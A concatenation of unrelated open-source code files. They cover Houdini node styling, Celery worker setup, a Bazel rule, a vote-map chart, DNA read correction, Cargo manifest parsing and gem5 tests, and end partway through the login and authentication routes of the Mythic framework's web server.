file_path: Optional[str] = None,
):
self._color = color
self._color_type = color_type
self._shape = shape
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, StyleConstant):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __ne__(self, other):
if not isinstance(other, StyleConstant):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<StyleConstant {} ({})>".format(self.name, self.color)
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def color(self) -> hou.Color:
"""The mapped color."""
return self._color
# -------------------------------------------------------------------------
@property
def color_type(self) -> str:
"""The mapped color type."""
return self._color_type
# -------------------------------------------------------------------------
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
# -------------------------------------------------------------------------
@property
def name(self) -> str:
"""The name the color is mapped to."""
return self._name
# -------------------------------------------------------------------------
@property
def shape(self) -> Optional[str]:
"""The mapped shape."""
return self._shape
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
def apply_to_node(self, node: hou.Node):
"""Apply styling to a node.
:param node: Node to apply to
:return:
"""
if self.color is not None:
node.setColor(self.color)
if self.shape is not None:
node.setUserData("nodeshape", self.shape)
class StyleRule:
"""This class represents a color application bound to a name.
:param name: The rule's name.
:param color: The rule's color.
:param color_type: The rule's color type.
:param shape: The rule's shape.
:param file_path: The path to the definition file.
:return:
"""
def __init__(
self,
name: str,
color: hou.Color,
color_type: str,
shape: Optional[str] = None,
file_path: Optional[str] = None,
):
self._color = color
self._color_type = color_type
self._shape = shape
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, StyleRule):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __ne__(self, other):
if not isinstance(other, StyleRule):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<StyleRule {} ({})>".format(self.name, self.color)
def __str__(self):
value = self._get_typed_color_value()
components = [re.sub("\\.*0+$", "", "{:0.3f}".format(val)) for val in value]
return "(" + ", ".join(components) + ")"
# -------------------------------------------------------------------------
# NON-PUBLIC METHODS
# -------------------------------------------------------------------------
def _get_typed_color_value(self) -> Tuple[float]:
"""Get the appropriately typed color values.
:return: The color value in the correct type.
"""
to_func = getattr(self.color, self.color_type.lower())
return to_func()
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def color(self) -> hou.Color:
"""The mapped color."""
return self._color
@property
def color_type(self) -> str:
"""The mapped color type."""
return self._color_type
@property
def shape(self) -> Optional[str]:
"""The mapped shape name."""
return self._shape
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
@property
def name(self) -> str:
"""The name the style is mapped to."""
return self._name
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
def apply_to_node(self, node: hou.Node):
"""Apply styling to a node.
:param node: Node to apply to
:return:
"""
if self.color is not None:
node.setColor(self.color)
if self.shape is not None:
node.setUserData("nodeshape", self.shape)
class ConstantRule:
"""This class represents a style application bound to a named constant.
:param name: The rule's name.
:param constant_name: The constant name.
:param file_path: The path to the definition file.
:return:
"""
def __init__(self, name: str, constant_name: str, file_path: Optional[str] = None):
self._constant_name = constant_name
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, ConstantRule):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash((self.constant_name, self.name))
def __ne__(self, other):
if not isinstance(other, ConstantRule):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<ConstantRule {} ({})>".format(self.name, self.constant_name)
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def constant_name(self) -> str:
"""The mapped constant."""
return self._constant_name
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
@property
def name(self) -> str:
"""The name the style is mapped to."""
return self._name
|
ichnaea/taskapp/app.py | mikiec84/ichnaea | 348 | 10841 | """
Holds global celery application state and startup / shutdown handlers.
"""
from celery import Celery
from celery.app import app_or_default
from celery.signals import (
beat_init,
worker_process_init,
worker_process_shutdown,
setup_logging,
)
from ichnaea.log import configure_logging
from ichnaea.taskapp.config import (
configure_celery,
init_beat,
init_worker,
shutdown_worker,
)
@setup_logging.connect
def setup_logging_process(loglevel, logfile, format, colorize, **kwargs):
"""Called at scheduler and worker setup.
Configures logging using the same configuration as the webapp.
"""
configure_logging()
@beat_init.connect
def init_beat_process(signal, sender, **kw):
"""
Called automatically when `celery beat` is started.
Calls :func:`ichnaea.taskapp.config.init_beat`.
"""
celery_app = app_or_default()
init_beat(sender, celery_app)
@worker_process_init.connect
def init_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is started. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.init_worker`.
"""
# get the app in the current worker process
celery_app = app_or_default()
init_worker(celery_app)
@worker_process_shutdown.connect
def shutdown_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is stopped. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.shutdown_worker`.
"""
celery_app = app_or_default()
shutdown_worker(celery_app)
celery_app = Celery("ichnaea.taskapp.app")
configure_celery(celery_app)
|
dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | 169 | 10865 | <filename>dev/bazel/deps/micromkl.bzl<gh_stars>100-1000
#===============================================================================
# Copyright 2020-2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
load("@onedal//dev/bazel:repos.bzl", "repos")
micromkl_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
"%{os}/include",
],
libs = [
"%{os}/lib/intel64/libdaal_mkl_thread.a",
"%{os}/lib/intel64/libdaal_mkl_sequential.a",
"%{os}/lib/intel64/libdaal_vmlipp_core.a",
],
build_template = "@onedal//dev/bazel/deps:micromkl.tpl.BUILD",
)
micromkl_dpc_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
],
libs = [
"lib/intel64/libdaal_sycl.a",
],
build_template = "@onedal//dev/bazel/deps:micromkldpc.tpl.BUILD",
)
|
dataviz/euvotes.py | Udzu/pudzu | 119 | 10893 | from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import seaborn as sns
# generate map
df = pd.read_csv("datasets/euvotes.csv").set_index('country')
palette = tmap(RGBA, sns.cubehelix_palette(11, start=0.2, rot=-0.75))
ranges = [20000000,10000000,5000000,2000000,1000000,500000,200000,100000,0]
def votecolfn(n):
return palette[8 - next(i for i,x in enumerate(ranges) if n >= x)]
def colorfn(c):
if c not in df.index:
return "white" if c in ['Sea', 'Borders'] else "grey"
return votecolfn(int(df.loc[c].votes))
def labelfn(c):
if c not in df.index: return None
dfc = df.loc[c]
label = "{name} '{year}\n({votes:.2g}M)".format(name=dfc.leader.split(" ")[-1], year=dfc.year[2:], votes=int(dfc.votes) / 1000000)
return Image.from_text(label, arial(14, bold=True), align="center", padding=2)
map = map_chart("maps/Europe.png", colorfn, labelfn)
# legend
def box(c):
return Image.new("RGBA", (30, 30), c).place(Image.from_text("", arial(16, bold=True), "black", bg=c))
vote_arr = Image.from_array([
[box(votecolfn(n)), Image.from_text("<0.1M" if n < 100000 else ">{:.2g}M".format(n/1000000), arial(16), padding=(10,0))] for n in ranges
], bg="white", xalign=0)
vote_leg = Image.from_column([Image.from_text("# votes", arial(16, bold=True)), vote_arr], bg="white", xalign=0, padding=(0,5))
note_leg = Image.from_text("Multi-party national elections for executive head or party.", arial(16), max_width=100, bg="white", padding=(0,2))
legend = Image.from_column([vote_leg, note_leg], bg="white", xalign=0, padding=5).pad(1, "black")
chart = map.place(legend, align=(1,0), padding=10)
title = Image.from_column([
Image.from_text("EUROPEAN POPULAR VOTE RECORDS", arial(48, bold=True)),
Image.from_text("candidate or party with the highest absolute popular vote", arial(36))],
bg="white")
img = Image.from_column([title, chart], bg="white", padding=2)
img.place(Image.from_text("/u/Udzu", font("arial", 16), fg="black", bg="white", padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/euvotes.png")
|
sandbox/error-correct-pass2.py | sadeepdarshana/khmer | 558 | 10906 | #! /usr/bin/env python
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2011-2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: <EMAIL>
"""
Error correct reads based on a counting hash from a diginorm step.
Output sequences will be put in inputfile.corr.
% python scripts/error-correct-pass2 <counting.ct> <data1> [ <data2> <...> ]
Use '-h' for parameter help.
"""
import sys
import os
import screed
import khmer
from khmer import Countgraph
from khmer import khmer_args
from khmer.khmer_args import FileType as khFileType
DEFAULT_CUTOFF = 2
def output_single(read, new_sequence):
name = read.name
sequence = new_sequence
quality = None
if hasattr(read, 'quality'):
quality = read.quality[:len(sequence)]
sequence = sequence[:len(quality)] # sequence is _lengthened_
if quality:
assert len(sequence) == len(quality), (sequence, quality)
return "@%s\n%s\n+\n%s\n" % (name, sequence, quality)
else:
return ">%s\n%s\n" % (name, sequence)
def main():
parser = khmer_args.build_counting_args(
"Correct reads against an already-computed table",
citations=['counting', 'SeqAn'])
parser.add_argument("--trusted-cov", dest="trusted_cov", type=int,
default=DEFAULT_CUTOFF)
parser.add_argument("--theta", dest="bits_theta", type=float, default=1.0)
parser.add_argument('-o', '--output', dest='output_file',
help="output file for histogram; defaults to "
"<first filename>.corr in cwd.",
type=khFileType('w'), default=None)
parser.add_argument('counts_table')
parser.add_argument('readfile')
args = parser.parse_args()
print('loading counts')
ht = Countgraph.load(args.counts_table)
aligner = khmer.ReadAligner(ht,
args.trusted_cov,
args.bits_theta)
print("trusted:", args.trusted_cov)
corrfp = args.output_file
if not corrfp:
outfile = os.path.basename(args.readfile) + '.corr'
corrfp = open(outfile, 'w')
n_corrected = 0
for n, read in enumerate(screed.open(args.readfile)):
if n % 10000 == 0:
print('...', n, n_corrected, file=sys.stderr)
seq = read.sequence.replace('N', 'A')
# build the alignment...
score, graph_alignment, read_alignment, truncated = \
aligner.align(seq)
if not truncated:
graph_seq = graph_alignment.replace("-", "")
if graph_seq != seq:
n_corrected += 1
seq = graph_seq
corrfp.write(output_single(read, seq))
if __name__ == '__main__':
main()
|
src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | 1,511 | 10920 | <reponame>Siddhant-K-code/scancode-toolkit<filename>src/packagedcode/cargo.py
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import logging
import re
import attr
from packageurl import PackageURL
import toml
from commoncode import filetype
from commoncode import fileutils
from packagedcode import models
"""
Handle Rust cargo crates
"""
TRACE = False
logger = logging.getLogger(__name__)
if TRACE:
import sys
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
@attr.s()
class RustCargoCrate(models.Package):
default_type = 'cargo'
default_primary_language = 'Rust'
default_web_baseurl = 'https://crates.io'
default_download_baseurl = 'https://crates.io/api/v1'
default_api_baseurl = 'https://crates.io/api/v1'
@classmethod
def get_package_root(cls, manifest_resource, codebase):
return manifest_resource.parent(codebase)
def repository_homepage_url(self, baseurl=default_web_baseurl):
if self.name:
return '{}/crates/{}'.format(baseurl, self.name)
def repository_download_url(self, baseurl=default_download_baseurl):
if self.name and self.version:
return '{}/crates/{}/{}/download'.format(baseurl, self.name, self.version)
def api_data_url(self, baseurl=default_api_baseurl):
if self.name:
return '{}/crates/{}'.format(baseurl, self.name)
@attr.s()
class CargoToml(RustCargoCrate, models.PackageManifest):
file_patterns = ('Cargo.toml',)
extensions = ('.toml',)
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return filetype.is_file(location) and fileutils.file_name(location).lower() == 'cargo.toml'
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
package_data = toml.load(location, _dict=dict)
core_package_data = package_data.get('package', {})
name = core_package_data.get('name')
version = core_package_data.get('version')
description = core_package_data.get('description')
if description:
description = description.strip()
authors = core_package_data.get('authors')
parties = list(party_mapper(authors, party_role='author'))
declared_license = core_package_data.get('license')
package = cls(
name=name,
version=version,
description=description,
parties=parties,
declared_license=declared_license
)
yield package
@attr.s()
class CargoLock(RustCargoCrate, models.PackageManifest):
file_patterns = ('Cargo.lock',)
extensions = ('.lock',)
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return (filetype.is_file(location)
and fileutils.file_name(location).lower() == 'cargo.lock')
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
package_data = toml.load(location, _dict=dict)
package_dependencies = []
core_package_data = package_data.get('package', [])
for dep in core_package_data:
package_dependencies.append(
models.DependentPackage(
purl=PackageURL(
type='crates',
name=dep.get('name'),
version=dep.get('version')
).to_string(),
requirement=dep.get('version'),
scope='dependency',
is_runtime=True,
is_optional=False,
is_resolved=True,
)
)
yield cls(dependencies=package_dependencies)
def party_mapper(party, party_role):
"""
Yields a Party object with party of `party_role`.
https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
"""
for person in party:
name, email = parse_person(person)
yield models.Party(
type=models.party_person,
name=name,
role=party_role,
email=email)
def parse_person(person):
"""
https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
A "person" is an object with an optional "name" or "email" field.
A person can be in the form:
"author": "<NAME> <<EMAIL>>"
For example:
>>> p = parse_person('<NAME> <<EMAIL>>')
>>> assert p == ('<NAME>', '<EMAIL>')
>>> p = parse_person('<NAME>')
>>> assert p == ('<NAME>', None)
>>> p = parse_person('<<EMAIL>>')
>>> assert p == (None, '<EMAIL>')
"""
parsed = person_parser(person)
if not parsed:
name = None
parsed = person_parser_no_name(person)
else:
name = parsed.group('name')
email = parsed.group('email')
if name:
name = name.strip()
if email:
email = email.strip('<> ')
return name, email
person_parser = re.compile(
r'^(?P<name>[^\(<]+)'
r'\s?'
r'(?P<email><([^>]+)>)?'
).match
person_parser_no_name = re.compile(
r'(?P<email><([^>]+)>)?'
).match
|
tests/testing/units.py | mandaltj/gem5_chips | 135 | 10921 | <reponame>mandaltj/gem5_chips<filename>tests/testing/units.py
#!/usr/bin/env python2.7
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: <NAME>
from abc import ABCMeta, abstractmethod
from datetime import datetime
import difflib
import functools
import os
import re
import subprocess
import sys
import traceback
from results import UnitResult
from helpers import *
_test_base = os.path.join(os.path.dirname(__file__), "..")
class TestUnit(object):
"""Base class for all test units.
A test unit is a part of a larger test case. Test cases usually
contain two types of units, run units (run gem5) and verify units
(diff output files). All unit implementations inherit from this
class.
A unit implementation overrides the _run() method. The test runner
calls the run() method, which wraps _run() to protect against
exceptions.
"""
__metaclass__ = ABCMeta
def __init__(self, name, ref_dir, test_dir, skip=False):
self.name = name
self.ref_dir = ref_dir
self.test_dir = test_dir
self.force_skip = skip
self.start_time = None
self.stop_time = None
def result(self, state, **kwargs):
if self.start_time is not None and "runtime" not in kwargs:
self.stop_time = datetime.utcnow()
delta = self.stop_time - self.start_time
kwargs["runtime"] = delta.total_seconds()
return UnitResult(self.name, state, **kwargs)
def ok(self, **kwargs):
return self.result(UnitResult.STATE_OK, **kwargs)
def skip(self, **kwargs):
return self.result(UnitResult.STATE_SKIPPED, **kwargs)
def error(self, message, **kwargs):
return self.result(UnitResult.STATE_ERROR, message=message, **kwargs)
def failure(self, message, **kwargs):
return self.result(UnitResult.STATE_FAILURE, message=message, **kwargs)
def ref_file(self, fname):
return os.path.join(self.ref_dir, fname)
def out_file(self, fname):
return os.path.join(self.test_dir, fname)
def _read_output(self, fname, default=""):
try:
with open(self.out_file(fname), "r") as f:
return f.read()
except IOError:
return default
def run(self):
self.start_time = datetime.utcnow()
try:
if self.force_skip:
return self.skip()
else:
return self._run()
except:
return self.error("Python exception:\n%s" % traceback.format_exc())
@abstractmethod
def _run(self):
pass
class RunGem5(TestUnit):
"""Test unit representing a gem5 run.
Possible failure modes:
- gem5 failed to run -> STATE_ERROR
- timeout -> STATE_ERROR
- non-zero exit code -> STATE_ERROR
Possible non-failure results:
- exit code == 0 -> STATE_OK
- exit code == 2 -> STATE_SKIPPED
"""
def __init__(self, gem5, gem5_args, timeout=0, **kwargs):
super(RunGem5, self).__init__("gem5", **kwargs)
self.gem5 = gem5
self.args = gem5_args
self.timeout = timeout
def _run(self):
gem5_cmd = [
self.gem5,
"-d", self.test_dir,
"--stats-file", "text://stats.txt?desc=False",
"-re",
] + self.args
try:
with ProcessHelper(gem5_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
status, gem5_stdout, gem5_stderr = p.call(timeout=self.timeout)
except CallTimeoutException as te:
return self.error("Timeout", stdout=te.stdout, stderr=te.stderr)
except OSError as ose:
return self.error("Failed to launch gem5: %s" % ose)
stderr = "\n".join([
"*** gem5 stderr ***",
gem5_stderr,
"",
"*** m5out/simerr ***",
self._read_output("simerr"),
])
stdout = "\n".join([
"*** gem5 stdout ***",
gem5_stdout,
"",
"*** m5out/simout ***",
self._read_output("simout"),
])
# Signal
if status < 0:
return self.error("gem5 terminated by signal %i" % (-status, ),
stdout=stdout, stderr=stderr)
elif status == 2:
return self.skip(stdout=stdout, stderr=stderr)
elif status > 0:
return self.error("gem5 exited with non-zero status: %i" % status,
stdout=stdout, stderr=stderr)
else:
return self.ok(stdout=stdout, stderr=stderr)
class DiffOutFile(TestUnit):
"""Test unit comparing and output file and a reference file."""
# regular expressions of lines to ignore when diffing outputs
diff_ignore_regexes = {
"simout" : [
re.compile('^Redirecting (stdout|stderr) to'),
re.compile('^gem5 compiled '),
re.compile('^gem5 started '),
re.compile('^gem5 executing on '),
re.compile('^command line:'),
re.compile("^Couldn't import dot_parser,"),
re.compile("^info: kernel located at:"),
re.compile("^Couldn't unlink "),
re.compile("^Using GPU kernel code file\(s\) "),
],
"simerr" : [
#re.compile('^Simulation complete at'),
],
"config.ini" : [
re.compile("^(executable|readfile|kernel|image_file)="),
re.compile("^(cwd|input|codefile)="),
],
"config.json" : [
re.compile(r'''^\s*"(executable|readfile|kernel|image_file)":'''),
re.compile(r'''^\s*"(cwd|input|codefile)":'''),
],
}
def __init__(self, fname, **kwargs):
super(DiffOutFile, self).__init__("diff[%s]" % fname,
**kwargs)
self.fname = fname
self.line_filters = DiffOutFile.diff_ignore_regexes.get(fname, tuple())
def _filter_file(self, fname):
def match_line(l):
for r in self.line_filters:
if r.match(l):
return True
return False
with open(fname, "r") as f:
for l in f:
if not match_line(l):
yield l
def _run(self):
fname = self.fname
ref = self.ref_file(fname)
out = self.out_file(fname)
if not os.path.exists(ref):
return self.error("%s doesn't exist in reference directory" \
% fname)
if not os.path.exists(out):
return self.error("%s doesn't exist in output directory" % fname)
diff = difflib.unified_diff(
tuple(self._filter_file(ref)),
tuple(self._filter_file(out)),
fromfile="ref/%s" % fname, tofile="out/%s" % fname)
diff = list(diff)
if diff:
return self.error("ref/%s and out/%s differ" % (fname, fname),
stderr="".join(diff))
else:
return self.ok(stdout="-- ref/%s and out/%s are identical --" \
% (fname, fname))
class DiffStatFile(TestUnit):
"""Test unit comparing two gem5 stat files."""
def __init__(self, **kwargs):
super(DiffStatFile, self).__init__("stat_diff", **kwargs)
self.stat_diff = os.path.join(_test_base, "diff-out")
def _run(self):
STATUS_OK = 0
STATUS_NEW_STATS = 1
STATUS_FAILED = 2
stats = "stats.txt"
cmd = [
self.stat_diff,
self.ref_file(stats), self.out_file(stats),
]
with ProcessHelper(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
status, stdout, stderr = p.call()
if status in (STATUS_OK, STATUS_NEW_STATS):
return self.ok(stdout=stdout, stderr=stderr)
elif status == STATUS_FAILED:
return self.failure("Statistics mismatch",
stdout=stdout, stderr=stderr)
else:
return self.error("diff-out returned an error: %i" % status,
stdout=stdout, stderr=stderr)
|
mythic-docker/app/routes/routes.py | rmusser01/Mythic | 934 | 10922 | <reponame>rmusser01/Mythic<gh_stars>100-1000
from app import (
mythic,
links,
nginx_port,
listen_port,
mythic_admin_password,
mythic_admin_user,
default_operation_name,
mythic_db
)
import app
import asyncpg
import redis
from peewee_async import Manager
from sanic.response import json
from sanic import response
from sanic.exceptions import (
NotFound,
Unauthorized,
MethodNotSupported,
SanicException,
RequestTimeout,
)
import sys
from jinja2 import Environment, PackageLoader
from app.database_models.model import (
Operator,
Operation,
OperatorOperation,
ATTACK,
Artifact,
)
import datetime
import app.crypto as crypto
from sanic_jwt import BaseEndpoint, utils, exceptions
from sanic_jwt.decorators import scoped, inject_user
import ujson as js
from ipaddress import ip_address
from app.routes.authentication import invalidate_refresh_token
import app.database_models.model as db_model
from sanic.log import logger
from uuid import uuid4
import asyncio
env = Environment(loader=PackageLoader("app", "templates"), autoescape=True)
async def respect_pivot(my_links, request):
# given the links dictionary, update the server_ip and server_port to match what was received
# this will allow people using pivots (127.0.0.1:8888) to still access things going through to IP:other_port
updated_links = my_links
host_field = request.host.split(":")
if len(host_field) == 1:
server_ip = host_field[0]
if 'x-forwarded-port' in request.headers:
server_port = request.headers["x-forwarded-port"]
else:
if request.scheme == "https":
server_port = nginx_port
else:
server_port = listen_port
else:
server_ip = host_field[0]
server_port = host_field[1]
updated_links["server_ip"] = server_ip
updated_links["server_port"] = server_port
updated_links["login"] = "/login"
return updated_links
async def getSchemes(request):
if 'x-forwarded-proto' in request.headers:
if request.headers['x-forwarded-proto'] == "http":
return {"http": "http", "ws": "ws"}
else:
return {"http": "https", "ws": "wss"}
if request.scheme == "http":
return {"http": "http", "ws": "ws"}
else:
return {"http": "https", "ws": "wss"}
@mythic.route("/")
@inject_user()
@scoped("auth:user")
async def index(request, user):
template = env.get_template("main_page.html")
content = template.render(
name=user["username"],
links=await respect_pivot(links, request),
current_operation=user["current_operation"],
config=user["ui_config"],
view_utc_time=user["view_utc_time"],
** await getSchemes(request)
)
return response.html(content)
class Login(BaseEndpoint):
async def get(self, request):
error = ""
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
config={},
view_utc_time=False,
** await getSchemes(request)
)
return response.html(content)
async def post(self, request):
form = request.form
error = ""
username = None
ip = request.headers["x-real-ip"] if "x-real-ip" in request.headers else request.ip
from app.api.operation_api import send_all_operations_message
try:
username = form["username"][0] if 'username' in form and len(form['username']) > 0 else ""
password = form["password"][0] if 'password' in form and len(form['password']) > 0 else ""
user = await app.db_objects.get(db_model.operator_query, username=username)
if user.id == 1 and user.failed_login_count > 10 and (user.last_failed_login_timestamp
> datetime.datetime.utcnow() + datetime.timedelta(seconds=-60)):
# throttle their attempts to log in to 1 min between checks
error = "Too many failed login attempts, try again later"
user.failed_login_count += 1
user.last_failed_login_timestamp = datetime.datetime.utcnow()
await app.db_objects.update(user)
await send_all_operations_message(message=f"Throttling login attempts for {user.username} due to too many failed login attempts\nLast connection from {ip}",
level="warning", source="throttled_login_" + user.username)
elif not user.active:
error = "Account is not active, cannot log in"
await send_all_operations_message(message=f"Deactivated account {user.username} trying to log in from {ip}",
level="warning", source="deactivated_login_" + user.username)
elif await user.check_password(password):
try:
# update the last login time to be now
user.last_login = datetime.datetime.utcnow()
user.failed_login_count = 0
await app.db_objects.update(user)
if user.current_operation is not None:
# update that operations' event log that the user just signed in
await app.db_objects.create(
db_model.OperationEventLog,
operator=None,
operation=user.current_operation,
message="{} signed in from {}".format(user.username, ip),
)
(
access_token,
output,
) = await self.responses.get_access_token_output(
request,
{"user_id": user.id, "auth": "cookie"},
self.config,
self.instance,
)
refresh_token = (
await self.instance.auth.generate_refresh_token(
request, {"user_id": user.id, "auth": "cookie"}
)
)
output.update(
{self.config.refresh_token_name(): refresh_token}
)
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
access_token=access_token,
** await getSchemes(request),
refresh_token=refresh_token,
config={},
view_utc_time=False,
)
resp = response.html(content)
# resp = response.redirect("/")
resp.cookies[
self.config.cookie_access_token_name()
] = access_token
resp.cookies[self.config.cookie_access_token_name()][
"httponly"
] = True
resp.cookies[self.config.cookie_access_token_name()][
"samesite"
] = "strict"
resp.cookies[
self.config.cookie_refresh_token_name()
] = refresh_token
resp.cookies[self.config.cookie_refresh_token_name()][
"httponly"
] = True
resp.cookies[self.config.cookie_refresh_token_name()][
"samesite"
] = "strict"
return resp
except Exception as e:
print(str(sys.exc_info()[-1].tb_lineno) + " " + str(e))
logger.error("post login error:" + str(e))
else:
# user exists, but password is wrong
error = "Username or password invalid"
user.failed_login_count += 1
if user.failed_login_count >= 10 and user.active:
user.last_failed_login_timestamp = datetime.datetime.utcnow()
if user.id != 1:
user.active = False
await send_all_operations_message(message=f"Deactivating account {user.username} due to too many failed logins.\nLast connection from {ip}",
level="warning")
await app.db_objects.update(user)
except Exception as e:
if username is not None:
logger.warning("login error: " + str(e))
error = "Username or password invalid"
await send_all_operations_message(message=f"Attempt to login with unknown user: {username}, from {ip}",
level="warning", source="unknown_login" + ip)
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
config={},
view_utc_time=False,
** await getSchemes(request)
)
return response.html(content)
class UIRefresh(BaseEndpoint):
async def get(self, request, *args, **kwargs):
# go here if we're in the browser and our JWT expires so we can update it and continue on
payload = self.instance.auth.extract_payload(request, verify=True)
try:
user = await utils.call(
self.instance.auth.retrieve_user, request, payload=payload
)
except exceptions.MeEndpointNotSetup:
raise exceptions.RefreshTokenNotImplemented
user_id = await self.instance.auth._get_user_id(user)
refresh_token = await utils.call(
self.instance.auth.retrieve_refresh_token,
request=request,
